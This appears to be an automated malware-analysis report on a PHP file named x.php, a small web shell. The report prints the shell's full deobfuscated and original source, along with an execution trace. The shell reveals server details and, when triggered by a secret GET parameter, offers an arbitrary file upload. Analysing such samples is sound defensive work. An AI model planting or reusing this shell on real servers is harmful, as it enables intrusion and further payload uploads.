PHP Malware Analysis
Wff2ZXKr, x.php
md5: 14aa2addb58254d7af071b8703312364
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- php_uname (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
if (isset($_GET["klash"])) {
echo "<font color=#000000>[uname]" . php_uname() . "[/uname]";
echo "<br>";
print "\n";
if (@ini_get("disable_functions")) {
echo "DisablePHP=" . @ini_get("disable_functions");
} else {
echo "Disable PHP = NONE";
}
echo "<br>";
print "\n";
if (@ini_get("safe_mode")) {
echo "Safe Mode = ON";
} else {
echo "Safe Mode = OFF";
}
echo "<br>";
print "\n";
echo "<form method=post enctype=multipart/form-data>";
echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
if ($_POST["v"] == up) {
if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
echo "<b>Uploade Done</b>-->" . $_FILES["f"]["name"];
} else {
echo "<b>gagal";
}
}
}
echo "<!-- s7_C3ek= -->";
echo "<br>";Execution traces
data/traces/14aa2addb58254d7af071b8703312364_trace-1676261553.235.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:12:59.132841]
1 0 1 0.000174 393464
1 3 0 0.000252 399960 {main} 1 /var/www/html/uploads/x.php 0 0
1 3 1 0.000270 399960
0.000296 314200
TRACE END [2023-02-13 02:12:59.132995]
Generated HTML code
<html><head></head><body><br></body></html>Original PHP code
<?php if(isset($_GET["klash"])){echo"<font color=#000000>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Uploade Done</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?><?php echo "<!-- s7_C3ek= -->";echo "<br>";?>